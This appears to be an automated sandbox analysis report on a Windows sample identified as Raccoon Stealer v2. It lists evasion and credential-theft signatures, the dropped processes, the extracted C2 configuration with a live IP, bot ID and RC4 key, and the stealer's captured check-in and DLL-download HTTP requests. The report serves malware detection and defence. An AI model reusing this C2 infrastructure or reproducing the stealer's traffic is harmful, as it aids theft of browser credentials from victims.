
Windows Analysis Report
KbqArOlW06.exe

Overview

General Information

Sample Name: KbqArOlW06.exe
Analysis ID: 679264
MD5: 005297e7c0d555822b5a6f31fcdc7661
SHA1: 9d5f9d90a1574c333ec68dbc800cb70397a1826d
SHA256: 6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
Tags: exe, RecordBreaker

Detection

Raccoon Stealer v2
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
.NET source code contains potential unpacker
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • KbqArOlW06.exe (PID: 2740 cmdline: "C:\Users\user\Desktop\KbqArOlW06.exe" MD5: 005297E7C0D555822B5A6F31FCDC7661)
    • 2.0.0-beta2.cps.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe" MD5: 881CBC2DA4C6467AEC519F4909371AF8)
    • A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" MD5: B184AD382E1729FEEA1E7BB94307930F)
      • A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp (PID: 5096 cmdline: "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" MD5: D8467CA1F529C6C6DECB1B82DBAED1DF)
  • cleanup
{"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}
Yara matches in memory dumps (5 of 16 entries shown):

Source | Rule | Description | Author | Strings
00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |

Yara matches in unpacked PE files (5 of 16 entries shown):

Source | Rule | Description | Author | Strings
0.3.KbqArOlW06.exe.16636690.0.raw.unpack | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
0.3.KbqArOlW06.exe.16726700.2.raw.unpack | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
0.3.KbqArOlW06.exe.18de6818.7.raw.unpack | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
0.3.KbqArOlW06.exe.166866c8.1.raw.unpack | JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
                      No Sigma rule has matched
Snort IDS alerts:

Timestamp: 08/05/22-13:54:12.723337
SID: 2036934
Source IP: 192.168.2.4
Source Port: 49778
Destination IP: 51.195.166.178
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/05/22-13:54:12.825297
SID: 2036955
Source IP: 51.195.166.178
Source Port: 80
Destination IP: 192.168.2.4
Destination Port: 49778
Protocol: TCP
Classtype: A Network Trojan was detected


                      AV Detection

Source: KbqArOlW06.exe | Virustotal: Detection: 26%
Source: KbqArOlW06.exe | Metadefender: Detection: 28%
Source: KbqArOlW06.exe | ReversingLabs: Detection: 69%
Source: KbqArOlW06.exe | Avira: detected
Source: http://51.195.166.178/ | Virustotal: Detection: 7%
Source: 0.3.KbqArOlW06.exe.18de6818.7.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16726700.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16636690.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16866738.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.166866c8.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Raccoon {"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}
Source: KbqArOlW06.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb | source: freebl3.dll.16.dr
Source: Binary string: mozglue.pdb@+ | source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: nss3.pdb | source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb | source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb | source: vcruntime140.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb | source: msvcp140.dll.16.dr
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00453238 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose,

                      Networking

Source: Traffic | Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.4:49778 -> 51.195.166.178:80
Source: Traffic | Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 51.195.166.178:80 -> 192.168.2.4:49778
Source: Malware configuration extractor | URLs: http://51.195.166.178/
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:13 GMT; Content-Type: application/octet-stream; Content-Length: 2042296; Connection: keep-alive; Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT; ETag: "62543db4-1f29b8"; Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:15 GMT; Content-Type: application/octet-stream; Content-Length: 449280; Connection: keep-alive; Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT; ETag: "62543dae-6db00"; Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:17 GMT; Content-Type: application/octet-stream; Content-Length: 80128; Connection: keep-alive; Last-Modified: Sat, 28 May 2022 16:52:46 GMT; ETag: "6292535e-13900"; Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:18 GMT; Content-Type: application/octet-stream; Content-Length: 627128; Connection: keep-alive; Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT; ETag: "62543da8-991b8"; Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:19 GMT; Content-Type: application/octet-stream; Content-Length: 684984; Connection: keep-alive; Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT; ETag: "62543dc8-a73b8"; Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:20 GMT; Content-Type: application/octet-stream; Content-Length: 254392; Connection: keep-alive; Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT; ETag: "62543dbe-3e1b8"; Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.14.0 (Ubuntu); Date: Fri, 05 Aug 2022 11:54:23 GMT; Content-Type: application/octet-stream; Content-Length: 1099223; Connection: keep-alive; Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT; ETag: "62541f08-10c5d7"; Accept-Ranges: bytes
                      Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://ocsp.digicert.com0O
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: http://www.digicert.com/CPS0
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://www.innosetup.com/
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.palkornel.hu/innosetup
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.palkornel.hu/innosetup%1
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://www.remobjects.com/ps
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://www.remobjects.com/psU
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: https://mozilla.org0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.dr | String found in binary or memory: https://www.digicert.com/CPS0
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mediachance.com/
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mediachance.com/&
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mediachance.com/.
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mediachance.com/2
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1 | Content-Type: text/plain; | User-Agent: record | Host: 51.195.166.178 | Connection: Keep-Alive | Cache-Control: no-cache
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded; charset=utf-8 | User-Agent: mozzzzzzzzzzz | Host: 51.195.166.178 | Content-Length: 94 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36 | Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6

                      System Summary

                      Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: section name: .a|D
                      Source: 2.0.0-beta2.cps.exe.0.dr | Static PE information: section name: .=xC
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe | Code function: 21_2_004088C0
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00490830
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004688B8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00482CD8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00472090
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00452194
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0043E240
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0043083C
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0046A974
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_004449B8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00434AB4
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_00444F60
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp | Code function: 22_2_0048908C
